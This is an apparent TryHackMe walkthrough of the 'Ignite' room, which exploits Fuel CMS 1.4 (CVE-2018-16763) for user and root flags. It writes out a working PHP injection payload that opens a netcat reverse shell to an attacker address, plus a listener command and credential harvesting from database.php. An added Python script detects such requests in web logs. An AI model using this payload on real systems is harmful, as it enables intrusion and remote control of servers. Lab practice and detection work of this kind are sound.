TryHackMe solution: Ignite

Link: https://tryhackme.com/room/ignite

#1 “User.txt”

First, we access: http://10.10.237.127/

The page is running Fuel CMS version 1.4. A little research shows that this version has a vulnerability, CVE-2018-16763.

Scrolling down, we find a login link along with the admin credentials.

After logging in, we can exploit the vulnerability. The vulnerable endpoint is:

http://10.10.237.127/fuel/pages/select/?filter=

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Trigger our shell with the payload:

'+pi(print($a='system'))+$a('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')+'

URL-encoded:

http://10.10.237.127/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.6.63.158%201234%20%3E%2Ftmp%2Ff%27%29%2b%27

And we find the user’s flag.
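The request above as seen from the detection side, as an added example that is not part of the original write-up: it scans web access logs for code-like values in the filter parameter of /fuel/pages/select/. The combined log format, the token list, and the sample log lines (documentation IP ranges, a harmless `id` command) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache/nginx "combined" access-log lines.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
ENDPOINT = "/fuel/pages/select"

# A normal filter value is a plain search term. These tokens (an assumed,
# non-exhaustive list) indicate PHP code: quote-then-concatenation, a variable
# being assigned or called, or a command-execution function call.
SUSPICIOUS_RE = re.compile(
    r"['\"]\s*\+"
    r"|\$\w+\s*[=(]"
    r"|\b(?:system|exec|passthru|shell_exec|popen|eval|assert)\s*\(",
    re.IGNORECASE,
)

def suspicious_filter(target):
    """Return the decoded filter value if it looks like code, else None."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith(ENDPOINT):
        return None
    # parse_qs percent-decodes, so %27%2b... is inspected as '+...
    for value in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        if SUSPICIOUS_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_filter) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if match:
            value = suspicious_filter(match.group("target"))
            if value is not None:
                hits.append((match.group("ip"), value))
    return hits

# Constructed sample log lines (documentation IP ranges, harmless command).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27id%27)%2b%27 HTTP/1.1" 200 734 "-" "curl/8.0"',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /blog/?filter=%27%2bx HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"ALERT {ip} filter={value!r}")
```

Only the second sample line is flagged: the first carries a plain search term, and the third uses a filter parameter on an unrelated path.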

#2 “Root.txt”

Enumerating the web page folder, we find the database file at /var/www/html/fuel/application/config/database.php.

Reading that file, we find the root’s credentials.

su -

And we find the root’s flag.
